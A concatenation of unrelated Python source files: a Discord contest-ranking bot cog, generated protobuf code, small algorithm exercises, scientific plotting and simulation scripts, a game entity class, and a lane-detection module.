datas[language][language_ranking - 2][2] if language_ranking - 1 else _('nobody') # if rang index isn't 0
)
embed.add_field(name=_('Your participation with {}').format(language),
value=formatted_informations,
inline=False)
embed.set_image(url="attachment://graph.png")
fn = partial(self.create_graph_bars, datas, _("Breakdown by languages used."))
final_buffer = await self.bot.loop.run_in_executor(None, fn)
file = discord.File(filename="graph.png", fp=final_buffer)
await ctx.channel.send(embed=embed, file=file)
@staticmethod
def create_graph_bars(datas, title): # title in arguments because translations doesn't work in a separated thread
fig, ax = plt.subplots()
langs = datas.keys()
values = [len(v) for v in datas.values()]
ax.bar(langs, values,
color=misc.Color(10, 100, 255, 0.5).mpl,
edgecolor=misc.Color(10, 100, 255).mpl,
linewidth=5)
ax.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}')) # No decimal places
ax.set_yticks(range(1, max(values) + 1))
ax.set_title(title)
buff = io.BytesIO()
fig.savefig(buff)
buff.seek(0)
del fig
return buff
@event.command(
name='start',
usage='/event start <event_name>',
hidden=True
)
@checkers.is_high_staff()
async def start(self, ctx, *, name):
code_channel: discord.TextChannel = self.bot.get_channel(self.code_channel_id)
await self.edit_informations(state='open', date=datetime.now(), name=name)
await ctx.send(f'Event `{name}` started ! Participations are now open !')
await code_channel.send('```diff\n'
f'- {name.upper()}\n'
'```')
@event.command(
name='stop',
usage='/event stop',
hidden=True
)
@checkers.is_high_staff()
async def stop(self, ctx):
await self.edit_informations(state='ended')
event_informations = self.get_informations()
datas, datas_global, *__ = await self.get_participations()
medals = ['🥇', '🥈', '🥉']
formatted_text = ("```diff\n"
"- GLOBAL RANKING\n"
"```\n"
"{0}\n\n"
"```diff\n"
"- RANKING BY LANGUAGE\n"
"```\n")
formatted_text = formatted_text.format(
'\n'.join(
" {medal} {obj[1].mention} ({obj[1]}) - {obj[2]} chars".format(medal=medals[i], obj=datas_global[i]) for i in range(min(3, len(datas_global)))
)
)
for language, data in datas.items():
formatted_text += ("> ```diff\n"
f"> + {language.upper()}\n"
"> ```\n")
for i in range(min(len(data), 3)):
formatted_text += f"> {medals[i]} {data[i][1].mention} ({data[i][1]}) - {data[i][2]} chars\n"
formatted_text += '\n'
buffer = io.StringIO(formatted_text)
buffer.seek(0)
await ctx.send(f"Event `{event_informations['name']}` is now ended ! Participations are closed !", file=discord.File(buffer, 'ranking.txt'))
@event.command(
name='close',
usage='/event close',
hidden=True
)
@checkers.is_high_staff()
async def close(self, ctx):
await self.edit_informations(state='closed')
event_informations = self.get_informations()
await ctx.send(f"Event `{event_informations['name']}` is now closed !")
def setup(bot):
bot.add_cog(Event(bot))
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/protobuf/internal/file_options_test.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import descriptor_pb2 as google_dot_protobuf_dot_descriptor__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/protobuf/internal/file_options_test.proto',
package='google.protobuf.python.internal',
syntax='proto2',
serialized_options=None,
serialized_pb=b'\n0google/protobuf/internal/file_options_test.proto\x12\x1fgoogle.protobuf.python.internal\x1a google/protobuf/descriptor.proto\"\x1e\n\nFooOptions\x12\x10\n\x08\x66oo_name\x18\x01 \x01(\t:a\n\x0b\x66oo_options\x12\x1c.google.protobuf.FileOptions\x18\xac\xec\xb6\x39 \x01(\x0b\x32+.google.protobuf.python.internal.FooOptions'
,
dependencies=[google_dot_protobuf_dot_descriptor__pb2.DESCRIPTOR,])
FOO_OPTIONS_FIELD_NUMBER = 120436268
foo_options = _descriptor.FieldDescriptor(
name='foo_options', full_name='google.protobuf.python.internal.foo_options', index=0,
number=120436268, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=True, extension_scope=None,
serialized_options=None, file=DESCRIPTOR)
_FOOOPTIONS = _descriptor.Descriptor(
name='FooOptions',
full_name='google.protobuf.python.internal.FooOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='foo_name', full_name='google.protobuf.python.internal.FooOptions.foo_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=149,
)
DESCRIPTOR.message_types_by_name['FooOptions'] = _FOOOPTIONS
DESCRIPTOR.extensions_by_name['foo_options'] = foo_options
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
FooOptions = _reflection.GeneratedProtocolMessageType('FooOptions', (_message.Message,), {
'DESCRIPTOR' : _FOOOPTIONS,
'__module__' : 'google.protobuf.internal.file_options_test_pb2'
# @@protoc_insertion_point(class_scope:google.protobuf.python.internal.FooOptions)
})
_sym_db.RegisterMessage(FooOptions)
foo_options.message_type = _FOOOPTIONS
google_dot_protobuf_dot_descriptor__pb2.FileOptions.RegisterExtension(foo_options)
# @@protoc_insertion_point(module_scope)
|
print("Enter the number of rows: ")
rows = int(input())
i = rows
count=0
flag = 1
while i >= 1:
j = rows
while j > i:
# display space
print(' ', end=' ')
j -= 1
k = 1
while k <= i:
print(flag, end=' ')
k += 1
flag+=1
count+=1
print()
i -= 1
# OUTPUT
# Enter the number of rows:
# 5
# 1 2 3 4 5
# 6 7 8 9
# 10 11 12
# 13 14
# 15
|
# Program for Trie Insert and Search
# Trie node
class TrieNode:
def __init__(self):
self.children = [None]*26
self.isEndOfWord = False
# Trie Class
class Trie:
def __init__(self):
self.root = self.getNode()
def getNode(self):
return TrieNode()
def toIndex(self, ch):
return ord(ch)-ord('a')
# Function to Insert into Trie
def insert(self, key):
node = self.root
length = len(key)
for i in range(length):
idx = self.toIndex(key[i])
if not node.children[idx]:
node.children[idx] = self.getNode()
node = node.children[idx]
node.isEndOfWord = True
# Function for Trie Search
def search(self, key):
node = self.root
length = len(key)
for i in range(length):
idx = self.toIndex(key[i])
if not node.children[idx]:
return False
node = node.children[idx]
return node!=None and node.isEndOfWord
# Main function
# To test code, please edit keys list and print statements for search
def main():
keys = ["the","apple","there","hello","world", "by","python"]
output = ["Not present in trie", "Present in trie"]
# Construct Trie
trie = Trie()
for key in keys:
trie.insert(key)
# Search in trie
print("{} => {}".format("the", output[trie.search("the")]))
print("{} => {}".format("hi", output[trie.search("hi")]))
print("{} => {}".format("apple", output[trie.search("apple")]))
print("{} => {}".format("man", output[trie.search("man")]))
if __name__ == '__main__':
main()
## Sample Output ##
# the => Present in trie
# hi => Not present in trie
# apple => Present in trie
# man => Not present in trie |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Command line script to make a simple PDF plot of gcc vs datetime using
the roistats file for a particular site and ROI.
"""
from __future__ import absolute_import
from __future__ import print_function
import argparse
import os
import pandas as pd
from matplotlib import pyplot as plt
from . import config
plt.style.use("ggplot")
archive_dir = config.archive_dir
MIN_SUN_ANGLE = config.MIN_SUN_ANGLE
MAX_BRT = config.MAX_BRT
MIN_BRT = config.MIN_BRT
def main():
"""
Use pandas to generate plot of gcc values from roistats file.
"""
# set up command line argument processing
parser = argparse.ArgumentParser()
# options
parser.add_argument(
"-v",
"--verbose",
help="increase output verbosity",
action="store_true",
default=False,
)
# positional arguments
parser.add_argument("site", help="PhenoCam site name")
parser.add_argument("roiname", help="ROI name, e.g. DB_0001")
# get args
args = parser.parse_args()
sitename = args.site
roiname = args.roiname
verbose = args.verbose
if verbose:
print("site: {0}".format(sitename))
print("roiname: {0}".format(roiname))
print("verbose: {0}".format(verbose))
# set roistats input filename
inname = "{}_{}_roistats.csv".format(sitename, roiname)
indir = os.path.join(archive_dir, sitename, "ROI")
inpath = os.path.join(indir, inname)
# set 3-day summary input filename
inname2 = "{}_{}_3day.csv".format(sitename, roiname)
inpath2 = os.path.join(indir, inname2)
# set output filename
outname = "{}_{}_roistats.pdf".format(sitename, roiname)
outdir = os.path.join(archive_dir, sitename, "ROI")
outpath = os.path.join(outdir, outname)
if verbose:
print("archive dir: {}".format(archive_dir))
print("ROI dir: {}".format(outdir))
print("ROI stats file: {}".format(inname))
print("3-day summary file: {}".format(inname2))
print("output file: {}".format(outname))
# read in roistats CSV file
df = pd.read_csv(inpath, comment="#", parse_dates=[[0, 1]])
# index data frame by datetime
df.index = df.date_local_std_time
# add a column for ROI brightness (r_mean + g_mean + b_mean)
df["brt"] = df["r_mean"] + df["g_mean"] + df["b_mean"]
# for the gcc percentiles we filter data first
#
# NOTE: should use vegindex routines to read the ROI list
# which should pick up any overrides of the defaults!
#
df_low = df[df.solar_elev < MIN_SUN_ANGLE]
df_day = df[df.solar_elev >= MIN_SUN_ANGLE]
df_brt_filtered = df_day[(df_day.brt < MIN_BRT) | (df_day.brt > MAX_BRT)]
df_good = df_day[(df_day.brt >= MIN_BRT) & (df_day.brt <= MAX_BRT)]
df_filtered = pd.concat([df_low, df_brt_filtered])
nrows_filtered, ncols = df_filtered.shape
# read in 3-day summary filename
df2 = pd.read_csv(inpath2, comment="#", parse_dates=[0])
df2.index = df2.date
# make plot
ax = df_good.gcc.plot(style="k.", markersize=0.3, figsize=[16, 5])
if nrows_filtered > 0:
df_filtered.gcc.plot(style="r.", ax=ax, markersize=0.5)
df2.gcc_90.plot(style="g-", ax=ax)
ax.set_title("{} {}".format(sitename, roiname))
ax.set_ylabel("gcc")
ax.set_xlabel("date")
lines, labels = ax.get_legend_handles_labels()
if nrows_filtered > 0:
ax.legend(
lines[1:], ["filtered values", "3-day gcc 90th percentile"], loc="best"
)
else:
ax.legend(lines[1:], ["3-day gcc 90th percentile"], loc="best")
fig = ax.get_figure()
fig.savefig(outpath)
if __name__ == "__main__":
main()
|
>>> basket = ['apple', 'orange', 'apple',
'pear', 'orange', 'banana']
>>> fruit = set(basket) # create a set
>>> fruit
set(['orange', 'pear', 'apple', 'banana'])
>>> 'orange' in fruit # fast membership testing
True
>>> 'crabgrass' in fruit
False
|
from nltk.corpus import wordnet as wn
class WordnetHandler():
def get_synonyms(self, word):
#print('in syns', word)
s = wn.synsets(word)
syns = [str(syn)[8:-7] for syn in s]
unique_syns = list(set(syns))
return unique_syns
def get_hypernyms(self, word):
"""
"domestic animal" is a hypernym of "dog"
:return:
"""
s = wn.synsets(word)
#check if hypernym list is longer that 0, otherwise index out of bounds
hypers = [str(hyper)[8:-7] for hyper in s[0].hypernyms()] if s else []
return hypers
def get_hyponyms(self, word):
"""
"dalmatian" is a hyponym of "dog"
:return:
"""
s = wn.synsets(word)
hypos = [str(hypo)[8:-7] for hypo in s[0].hyponyms()] if s else []
return hypos |
import numpy as np
class Conv1dObservation(object):
def __init__(self, non_lidar_obs, lidar_obs):
"""
:type non_lidar_obs: np.ndarray
:type lidar_obs: np.ndarray
"""
assert len(non_lidar_obs.shape) == 1
assert len(lidar_obs.shape) == 2
self._non_lidar_obs = non_lidar_obs
self._lidar_obs = lidar_obs
def __len__(self):
return self._non_lidar_obs.shape[0] + self._lidar_obs.shape[0]*self._lidar_obs.shape[1]
@property
def non_lidar_obs(self):
return self._non_lidar_obs
@property
def lidar_obs(self):
return self._lidar_obs
# @property
# def obs(self):
# return self._non_lidar_obs, self._lidar_obs
@property
def flatten(self):
return np.concatenate((self._non_lidar_obs, self._lidar_obs.flatten()), axis=None)
@property
def shape(self):
return self._non_lidar_obs.shape, self._lidar_obs.shape |
#!/usr/bin/env python3
import collections
import datetime
import itertools
import operator
import sys
records = [(datetime.datetime.strptime(r[0], '[%Y-%m-%d %H:%M'), r[1])
for r in map(lambda line: line.rstrip().split(sep='] '), sys.stdin)]
# Sort by time to assign each event to a guard.
records.sort(key=operator.itemgetter(0))
nap_deltas = collections.defaultdict(lambda: [0] * 60)
guard = None
for time, msg in records:
if msg.startswith('Guard'):
guard = int(msg[7:].split()[0])
elif msg.startswith('falls'):
nap_deltas[guard][time.minute] += 1
else:
nap_deltas[guard][time.minute] -= 1
# Integrate nap-deltas per minute to get naps per minute.
naps = [(guard, list(itertools.accumulate(deltas)))
for guard, deltas in nap_deltas.items()]
guard, minutes = max(naps, key=lambda g: sum(g[1]))
mode, count = max(enumerate(minutes), key=operator.itemgetter(1))
print(guard * mode)
|
"""
This file contains the implementation of the class Player.
Author: Alejandro Mujica ([email protected])
Date: 07/21/20
"""
from src.states.entities import player as player_states
from src.entity import Entity
import settings
class Player(Entity):
def __init__(self, x, y, game_level):
super(Player, self).__init__(
x, y, settings.PLAYER_WIDTH, settings.PLAYER_HEIGHT, 'martian',
game_level,
states={
'idle': lambda sm: player_states.IdleState(self, sm),
'walk': lambda sm: player_states.WalkState(self, sm),
'jump': lambda sm: player_states.JumpState(self, sm),
'fall': lambda sm: player_states.FallState(self, sm),
},
animations={
'idle': {
'frames': [0]
},
'walk': {
'frames': [9, 10],
'interval': 0.15
},
'jump': {
'frames': [2]
}
}
)
self.score = 0
self.coin_counter = {
'yellow': 0,
'red': 0,
'blue': 0,
'green': 0
}
self.dead = False
|
'''
Package definition for 'soane.items'.
'''
from soane.items.book import Book
from soane.items.note import Note
|
"""Example ox_herd plugins used by our app
"""
import requests
# Import base class so we can create plugins
from ox_herd.core.plugins import base
class CheckWeb(base.OxPlugTask):
"""Class to check on a web site.
This is meanly meant to serve as an example of a minimal plugin.
All we do is implement the main_call method.
"""
@classmethod
def main_call(cls, ox_herd_task):
"""Main method to check if web site is accesible.
:arg ox_herd_task: Instance of a CheckWeb task perhaps containing
additional data (e.g., ox_herd_task.name). If your
main_call does not need arguments, you can basically
just ignore ox_herd_task. If you do want to be able
to pass in arguments, see a more detailed discussion
of how to get arguments from the user and configure
a task in the full plugin documentation.
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
:returns: Dictionary with 'return_value' and 'json_blob' as
required for OxPluginComponent.
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
PURPOSE: Check if website is live.
"""
url = 'http://github.com'
result = requests.get(url)
return {
'return_value': 'Status=%s for checking url %s' % (
url, result.status_code)
}
|
import habitat
from habitat.sims.habitat_simulator.actions import HabitatSimActions
import cv2
import envs.spring_env
import numpy as np
from PIL import Image
from habitat_sim.utils.common import d3_40_colors_rgb
import os, glob
import json
import argparse
import quaternion
from scipy.spatial.transform import Rotation
import sims.actions
FORWARD_KEY="w"
LEFT_KEY="a"
RIGHT_KEY="d"
FINISH="f"
LOOK_UP_KEY="u"
LOOK_DOWN_KEY="j"
STRAFE_LEFT_KEY="n"
STRAFE_RIGHT_KEY="m"
def transform_rgb_bgr(image):
return image[:, :, [2, 1, 0]]
def extract_semantic_image(observations):
semantic_img = Image.new("P", (observations['semantic'].shape[1], observations['semantic'].shape[0]))
semantic_img.putpalette(d3_40_colors_rgb.flatten())
semantic_img.putdata((observations['semantic'].flatten() % 40).astype(np.uint8))
semantic_img = semantic_img.convert("RGB")
semantic_img = np.array(semantic_img)
print(observations["agent_state"])
return semantic_img
def show_observations(observations):
print("Destination, distance: {:3f}, theta(radians): {:.2f}".format(
observations["pointgoal_with_gps_compass"][0],
observations["pointgoal_with_gps_compass"][1]))
numpy_horizontal1 = np.hstack((transform_rgb_bgr(observations["rgb"]), transform_rgb_bgr(observations["rgb1"])))
semantic_img = extract_semantic_image(observations)
depth_image = np.stack((observations['depth'], observations['depth'], observations['depth']), axis=2)[:, :, :, 0]
depth_image = (255*depth_image).astype(np.uint8)
numpy_horizontal2 = np.hstack((semantic_img, depth_image))
numpy_vertical = np.vstack((numpy_horizontal1, numpy_horizontal2))
cv2.imshow("RGB+RGB1+SEMANTIC+DEPTH", numpy_vertical)
def get_action(keystroke):
action = None
if keystroke == ord(FORWARD_KEY):
action = HabitatSimActions.MOVE_FORWARD
print("action: FORWARD")
elif keystroke == ord(LEFT_KEY):
action = HabitatSimActions.TURN_LEFT
print("action: LEFT")
elif keystroke == ord(RIGHT_KEY):
action = HabitatSimActions.TURN_RIGHT
print("action: RIGHT")
elif keystroke == ord(FINISH):
action = HabitatSimActions.STOP
print("action: FINISH")
elif keystroke == ord(LOOK_UP_KEY):
action = HabitatSimActions.LOOK_UP
print("action: LOOK_UP")
elif keystroke == ord(LOOK_DOWN_KEY):
action = HabitatSimActions.LOOK_DOWN
print("action: LOOK_DOWN")
elif keystroke == ord(STRAFE_LEFT_KEY):
action = HabitatSimActions.STRAFE_LEFT
print("action: STRAFE_LEFT")
elif keystroke == ord(STRAFE_RIGHT_KEY):
action = HabitatSimActions.STRAFE_RIGHT
print("action: STRAFE_RIGHT")
else:
print("INVALID KEY")
return action
def add_strafe_actions(config):
HabitatSimActions.extend_action_space("STRAFE_LEFT")
HabitatSimActions.extend_action_space("STRAFE_RIGHT")
config.defrost()
config.TASK.POSSIBLE_ACTIONS = config.TASK.POSSIBLE_ACTIONS + [
"STRAFE_LEFT",
"STRAFE_RIGHT",
]
config.TASK.ACTIONS.STRAFE_LEFT = habitat.config.Config()
config.TASK.ACTIONS.STRAFE_LEFT.TYPE = "StrafeLeft"
config.TASK.ACTIONS.STRAFE_RIGHT = habitat.config.Config()
config.TASK.ACTIONS.STRAFE_RIGHT.TYPE = "StrafeRight"
config.SIMULATOR.ACTION_SPACE_CONFIG = "NoNoiseStrafe"
config.freeze()
def prepare_directories(dataset_folder):
folders = {}
folders["rgb_left_folder"] = os.path.join(dataset_folder, "RGB_left")
os.makedirs(folders["rgb_left_folder"], exist_ok=True)
folders["rgb_right_folder"] = os.path.join(dataset_folder, "RGB_right")
os.makedirs(folders["rgb_right_folder"], exist_ok=True)
folders["semantic_folder"] = os.path.join(dataset_folder, "semantic")
os.makedirs(folders["semantic_folder"], exist_ok=True)
folders["depth_folder"] = os.path.join(dataset_folder, "depth")
os.makedirs(folders["depth_folder"], exist_ok=True)
return folders
def cleanup_files(dataset_folder):
files = glob.glob(os.path.join(dataset_folder,'./*/*'))
agent_states_path = os.path.join(dataset_folder, 'agent_states.json')
if os.path.isfile(agent_states_path):
files.append(agent_states_path)
for f in files:
os.remove(f)
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--manual", type=int, default=1, help="True: manual creation, False: automatic creation using actions from file")
parser.add_argument("-a", "--actions_filename", type=str, default='actions.json', help="Filename of the file with actions for automatic dataset creation")
parser.add_argument("-d", "--dataset_folder", type=str, default='data/spring_dataset', help="Path to the folder with dataset")
parser.add_argument("-v", "--video", type=str, default=None, help="If given then video is captured with specified name")
args = parser.parse_args()
return args
# main
if __name__ == "__main__":
args = get_arguments()
config = habitat.get_config(config_paths="configs/tasks/pointnav.yaml")
add_strafe_actions(config)
W = config.SIMULATOR.RGB_SENSOR.WIDTH
H = config.SIMULATOR.RGB_SENSOR.HEIGHT
if args.video:
cap = cv2.VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'MP4V')
out = cv2.VideoWriter(os.path.join(args.dataset_folder, args.video), fourcc, 30.0, (W,H))
###############################################
hfov = float(config.SIMULATOR.DEPTH_SENSOR.HFOV) * np.pi / 180.
vfov = 2. * np.arctan(np.tan(hfov / 2) * H / W)
max_depth = config.SIMULATOR.DEPTH_SENSOR.MAX_DEPTH
###############################################
actions = []
agent_states = {}
if not args.manual:
with open(os.path.join(args.dataset_folder, args.actions_filename)) as f:
actions = json.load(f)['sequence']
folders = prepare_directories(args.dataset_folder)
cleanup_files(args.dataset_folder)
objects = []
# objects = [["trex", [-2.64, 0.70, 1.59]],
# ["bird", [-2.64, 0.2, 2.59]],
# ["bucket", [-3.64, 0.2, 1.59]],
# ["plane", [-3.64, 0.2, 2.59]],
# ["banana", [7.31 , 0.05, -0.28]]]
# initialize env
env = envs.spring_env.SpringEnv(
config=config, objects=objects
)
print("Environment creation successful")
observations = env.reset()
show_observations(observations)
print("Agent stepping around inside environment.")
count_steps = 0
agent_states[count_steps] = {"position": observations["agent_state"].position.tolist(),
"rotation": np.asarray(observations["agent_state"].rotation,
dtype=np.quaternion).view((np.double, 4)).tolist()}
while not env.episode_over:
action = None
if args.manual:
keystroke = cv2.waitKey(0)
action = get_action(keystroke)
if action is None:
continue
actions.append(action)
else:
action = actions[count_steps]
observations = env.step(action)
count_steps += 1
show_observations(observations)
agent_states[count_steps] = {"position": observations["agent_state"].position.tolist(),
"rotation": np.asarray(observations["agent_state"].rotation,
dtype=np.quaternion).view((np.double, 4)).tolist()}
rgb_left_image = cv2.cvtColor(observations['rgb'], cv2.COLOR_RGB2BGR)
rgb_right_image = cv2.cvtColor(observations['rgb'], cv2.COLOR_RGB2BGR)
semantic_image = extract_semantic_image(observations)
depth_image = np.stack((observations['depth'], observations['depth'], observations['depth']), axis=2)[:, :, :, 0]
depth_image = (255*depth_image).astype(np.uint8)
if args.video:
out.write(rgb_left_image)
cv2.imwrite(os.path.join(folders["rgb_left_folder"], "{}.jpg".format(count_steps)),
rgb_left_image, [int(cv2.IMWRITE_JPEG_QUALITY), 70])
cv2.imwrite(os.path.join(folders["rgb_right_folder"], "{}.jpg".format(count_steps)),
rgb_right_image, [int(cv2.IMWRITE_JPEG_QUALITY), 70])
cv2.imwrite(os.path.join(folders["semantic_folder"], "{}.jpg".format(count_steps)),
semantic_image, [int(cv2.IMWRITE_JPEG_QUALITY), 70])
cv2.imwrite(os.path.join(folders["depth_folder"], "{}.jpg".format(count_steps)),
depth_image, [int(cv2.IMWRITE_JPEG_QUALITY), 70])
K = np.array([
[1 / np.tan(hfov / 2.), 0., 0., 0.],
[0., 1 / np.tan(vfov / 2.), 0., 0.],
[0., 0., -1, 0], # -1 to swap floor/ceil distances
[0., 0., 0, 1]])
#quaternion = [observations["agent_state"].sensor_states["rgb"].rotation.w] + observations["agent_state"].sensor_states["rgb"].rotation.item().vec.tolist()
R = quaternion.as_rotation_matrix(observations["agent_state"].sensor_states["rgb"].rotation)#Rotation.from_quat(quaternion).as_matrix()
cam_pos = observations["agent_state"].sensor_states["rgb"].position
T = -R.T @ cam_pos
C = np.eye(4)
C[0:3,0:3] = R.T
C[0:3,3] = T.squeeze()
d = depth_image[depth_image.shape[0]//2][depth_image.shape[1]//2][0]/255*max_depth
pixel_coordinate = np.array([0, 0, d, 1]).reshape(4,-1)
xyz = np.linalg.inv(C) @ np.linalg.inv(K) @ pixel_coordinate
env.add_object("objects/banana", xyz[:3].T.squeeze())
# d = depth_image[depth_image.shape[0]//4][depth_image.shape[1]//2][0]/255*max_depth
# pixel_coordinate = np.array([0, 0.5*d, d, 1]).reshape(4,-1)
#
# xyz = np.linalg.inv(C) @ np.linalg.inv(K) @ pixel_coordinate
# env.add_object("objects/banana", xyz[:3].T.squeeze())
print(observations["agent_state"].sensor_states["rgb"].position)
print("XYZ: {}".format(xyz[:3].T.squeeze()))
# end
if args.video:
cap.release()
out.release()
cv2.destroyAllWindows()
with open(os.path.join(args.dataset_folder, "agent_states.json"), 'w', encoding='utf-8') as f:
json.dump(agent_states, f, ensure_ascii=False, indent=4)
if args.manual:
data = {'sequence': actions}
with open(os.path.join(args.dataset_folder, args.actions_filename), 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
print('DATASET WITH LENGTH {} FINISHED'.format(count_steps))
|
import numpy as np
import cv2
def eval_poly(vec, poly):
"""
Evaluates value of a polynomial at a given point
:param vec: The given point :float
:param poly: The polynomial :ndarray[3,]
:return: value of polynomial at given point :float
"""
return vec ** 2 * poly[0] + vec * poly[1] + poly[2]
def curvature_of_poly(poly, y):
"""
Given a polynomial and a point y calculate its curvature
:param poly: The polynomial :ndarray[3,]
:param y: The point to calculate curvature at :float
:return: The curvature of Polynomial at y
"""
a, b, c = poly
return ((1 + (2 * a * y + b) ** 2) ** (3 / 2)) / np.abs(2 * a)
class Lane:
left_anchor = None
right_anchor = None
left_poly = None
left_poly_m = None
right_poly = None
right_poly_m = None
win_count = None
search_window_margin = None
min_votes = None
image_size = None
mean_dist = 0
dist_count = 0
data_min = 0
curvature = 0
vehicle_center = 0
lane_width = 3.7 # average lane width
vehicle_width = 2.5 # average vehicle width
xm_per_pix = lane_width / 580 # 1280 - 350(offset)*2 = 580px
ym_per_pix = 30 / 720 # 30 meters actual lane length in ROI perspective projected on 720px
M_ = None
M_inv_ = None
@classmethod
def threshold(cls, frame):
"""
Combine Saturation and Sobel thresholds to extract possible lane indication pixels
:param frame: The given image to extract lane pixels
:return: Grayscale image with highlighted possible lane pixels
"""
image = cv2.cvtColor(frame, cv2.COLOR_RGB2HLS) # Convert to HLS
s_ = image[:, :, 2] # extract S channel from HLS
_h, _w = s_.shape
image = cv2.GaussianBlur(s_, (5, 5), 1) # Blur before thresholding to reduce noise
highly_saturated = np.uint8(image > 200)
sobel_strong_edges = np.uint8(cv2.Sobel(image, cv2.CV_64F, 1, 0) > 20)
# Highlight where highly saturated or strong sobel edge pixels are found
image = highly_saturated * 50 + sobel_strong_edges * 50
return image
def find_hist_based_anchors(self, frame):
"""
Using histograms find left and right lane polynomial starting points
:param frame: Input frame
:return: None
"""
# define bounds
frame_height = frame.shape[0]
win_height = int(frame_height / self.win_count)
mid_point = int(frame.shape[1] / 2)
# calculate histogram of last 1/8th row patch
hist = np.sum(frame[-win_height:, :] > 0, 0)
# extract max values one from left half of image and one from right half as left and right anchors
# respectively
self.left_anchor = np.argmax(hist[:mid_point])
self.right_anchor = np.argmax(hist[mid_point:]) + mid_point
def extract_poly(self, frame):
"""
Use left and right anchors as starting point and apply sliding window approach to find points of interest
for lane polynomial
:param frame: Input frame
:return: None
"""
debug = np.copy(frame) # for debug draw sliding window rects
# Define current left and right x positions
cur_left = self.left_anchor
cur_right = self.right_anchor
# Search parameters setup
height, width = frame.shape[:2]
win_height = int(height / self.win_count)
margin = self.search_window_margin
# Storage for left and right points of interest for polynomial
nonzero_indices_left = []
nonzero_indices_right = []
# Extract all nonzero x and y locations from frame
nonzero_y, nonzero_x = np.nonzero(frame)
# For all sliding windows
for i in range(self.win_count):
# Define window start and end
win_set = height - (i + 1) * win_height
win_end = height - i * win_height
# Find left and right polynomial candidates by checking if they lie inside the sliding window
left_candidates = (
(nonzero_y >= win_set) &
(nonzero_y < win_end) &
(nonzero_x >= max(cur_left - margin, 0)) &
(nonzero_x < min(cur_left + margin, width))
).nonzero()[0]
right_candidates = (
(nonzero_y >= win_set) &
(nonzero_y < win_end) &
(nonzero_x >= max(cur_right - margin, 0)) &
(nonzero_x < min(cur_right + margin, width))
).nonzero()[0]
# Add found candidates to their respective storages
nonzero_indices_left += left_candidates.tolist()
nonzero_indices_right += right_candidates.tolist()
# If there are more candidates than minimum votes shift the current x positions to mean of current window
if np.sum(left_candidates) > self.min_votes:
cur_left = np.mean(nonzero_x[left_candidates])
if np.sum(right_candidates) > self.min_votes:
cur_right = np.mean(nonzero_x[right_candidates])
# Draw rects for debugging
cv2.rectangle(debug, (int(cur_left - margin), win_set), (int(cur_left + margin), win_end), 255)
cv2.rectangle(debug, (int(cur_right - margin), win_set), (int(cur_right + margin), win_end), 255)
# Extract x and y indices of candidates for both left and right polynomial
left_y = nonzero_y[nonzero_indices_left]
left_x = nonzero_x[nonzero_indices_left]
right_y = nonzero_y[nonzero_indices_right]
right_x = nonzero_x[nonzero_indices_right]
# if total candidate points of polynomial are greater than a threshold fit polynomial to the points
# Also find metric polynomials to use for curvature and vehicle position detection
if np.sum(nonzero_indices_left) > 100:
self.left_poly = np.polyfit(left_y, left_x, 2)
# Find a metric polynomial by converting points to read world points
left_y_metric = left_y * self.ym_per_pix
left_x_metric = (left_x - self.warp_offset) * self.xm_per_pix # Consider perspective transform offset
self.left_poly_m = np.polyfit(left_y_metric, left_x_metric, 2)
if np.sum(nonzero_indices_right) > 100:
self.right_poly = np.polyfit(right_y, right_x, 2)
right_y_metric = right_y * self.ym_per_pix
right_x_metric = (right_x - self.warp_offset) * self.xm_per_pix
self.right_poly_m = np.polyfit(right_y_metric, right_x_metric, 2)
# keep track of overall mean pixel distances between left and right polynomials
self.mean_dist += self.right_anchor - self.left_anchor
self.dist_count += 1
# estimate curvature and vehicle position using found lane polynomials
self.estimate_curvature_and_position()
def estimate_curvature_and_position(self):
"""
Estimates curvature of lane and position of vehicle
:return: None
"""
height = self.image_size[0]
eval_point = (height - 1) * self.ym_per_pix # point closest to vehicle to estimate curvature at
# Find curvature of both polynomials and take mean
left_curvature = curvature_of_poly(self.left_poly_m, eval_point)
right_curvature = curvature_of_poly(self.right_poly_m, eval_point)
self.curvature = (left_curvature + right_curvature) / 2
# Find vehicle position
absolute_vehicle_center = (eval_poly(eval_point, self.right_poly_m) +
eval_poly(eval_point, self.left_poly_m)) / 2
# Estimate vehicle position relative to lane center
self.vehicle_center = self.lane_width / 2 - absolute_vehicle_center
def create_image_mask(self):
"""
Create image mask based on lane polynomials to highlight frame
:return: Mask image
"""
h, w = self.image_size
im = np.zeros((h, w, 3), dtype=np.uint8)
# Sample y points starting from top confidence location to bottom of image
plot_y = np.linspace(self.data_min, h - 1, h - self.data_min)
# Calculate values of polynomials at y sample points
left_plt_x = self.left_poly[0] * plot_y ** 2 + self.left_poly[1] * plot_y + self.left_poly[2]
right_plt_x = self.right_poly[0] * plot_y ** 2 + self.right_poly[1] * plot_y + self.right_poly[2]
# Update mean dist using intercepts of polynomials
self.mean_dist += right_plt_x[-1] - left_plt_x[-1]
self.dist_count += 1
# For each sampled y
for i in range(h - self.data_min):
# Find start and end lane pixel
start = int(max(0, left_plt_x[i]))
end = int(min(w, right_plt_x[i]))
